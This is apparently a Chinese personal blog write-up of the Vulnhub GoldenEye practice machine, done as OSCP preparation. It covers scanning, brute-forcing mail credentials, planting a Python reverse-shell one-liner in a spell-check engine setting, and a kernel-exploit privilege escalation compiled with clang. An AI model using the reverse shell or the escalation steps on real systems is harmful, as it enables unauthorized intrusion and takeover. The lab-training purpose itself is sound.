r0ckyzzz's Blog.

Vulnhub靶机GoldenEye通关笔记

Word count: 548Reading time: 2 min
2020/03/16 Share

Vulnhub靶机GoldenEye通关笔记

前言

下载地址:https://www.vulnhub.com/entry/goldeneye-1,240/
接下来就开始为考OSCP做准备
https://www.freebuf.com/articles/neopoints/221948.html
我会把里面推荐的vulnhub的靶机都做一遍
htb的靶机要连openvpn才能做网络有点卡所以如果以后有时间再做
Alt text

开始

nmap 扫描

Alt text

Alt text
打开网站是这样

右键查看源码里面给了提示

Alt text

Alt text
解码之后得到密码

账号:boris
密码 :InvincibleHack3r

Natalya 可疑人员 后面应该要用到

Alt text
他说pop3开放在很高的端口 刚刚没有扫出来 再扫一遍

Alt text
扫出两个端口
pop3端口如果是相邻的话 第一个端口是ssl/pop3 第二个是pop3

Alt text
并且在源代码的最下面找到了这个

Alt text

Alt text

爆破出两个

boris:secret1!
Natalya:bird

Alt text
登陆邮箱看看

Alt text

在Natalya的邮箱中找到重要邮件
Alt text

把那个网址加入hosts再访问 用给的账号密码的登陆

Alt text
有上传点 穿了个一句话上去发现不能执行 只能下载 这一点卡了好久

Alt text

发现有个messge
并且给了邮箱 爆破一下

Alt text
真的爆破出来了
doak:goat
Alt text

在私人文件里找到一点线索

Alt text

Alt text

strings一下得到一个base64
解密之后得到
xWinter1995x!
Alt text

猜测是admin的密码
直接登陆上了

Alt text
这里感觉可以利用一下

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.3.55',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

这个是检查拼写的引擎

Alt text
要把引擎改成这个

Alt text

反弹成功

查看系统版本

Alt text

找到了exp 看一下
Alt text

Alt text

编译好上传上去了 但是没有gcc 不能正常运行
Alt text

看看有没有替代gcc的工具

clang --help 发现安装了clang 用这个可以代替gcc

sed -i 's/gcc/clang/g' exp.c

成功提权
Alt text

得到flag

Alt text

Alt text

总结

这次的渗透靶机设计的非常好,有ctf的风格也结合了实际的渗透技巧,也学到了新的技巧,当gcc被禁用的时候可以寻找代替的编译器 例如 clang cc

CATALOG
  1. 1. Vulnhub靶机GoldenEye通关笔记
    1. 1.1. ¶前言
    2. 1.2. ¶开始
    3. 1.3. ¶总结